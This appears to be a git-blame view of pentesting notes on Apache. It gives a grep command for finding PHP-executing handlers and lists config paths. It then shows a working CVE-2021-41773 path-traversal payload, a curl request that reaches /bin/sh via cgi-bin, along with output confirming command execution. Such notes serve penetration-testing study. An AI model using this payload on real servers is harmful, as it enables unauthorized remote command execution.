2020-07-15 15:43:14 +00:00
|
|
|
# Apache
|
|
|
|
|
|
|
|
## Executable PHP extensions
|
|
|
|
|
|
|
|
Check which extensions is executing the Apache server. To search them you can execute:
|
|
|
|
|
|
|
|
```bash
|
|
|
|
grep -R -B1 "httpd-php" /etc/apache2
|
|
|
|
```
|
|
|
|
|
|
|
|
Also, some places where you can find this configuration is:
|
|
|
|
|
|
|
|
```bash
|
|
|
|
/etc/apache2/mods-available/php5.conf
|
|
|
|
/etc/apache2/mods-enabled/php5.conf
|
|
|
|
/etc/apache2/mods-available/php7.3.conf
|
|
|
|
/etc/apache2/mods-enabled/php7.3.conf
|
|
|
|
```
|
|
|
|
|
2021-10-06 08:21:44 +00:00
|
|
|
## CVE-2021-41773
|
|
|
|
|
|
|
|
```bash
|
|
|
|
curl http://172.18.0.15/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh --data 'echo Content-Type: text/plain; echo; id; uname'
|
|
|
|
uid=1(daemon) gid=1(daemon) groups=1(daemon)
|
|
|
|
Linux
|
|
|
|
```
|
|
|
|
|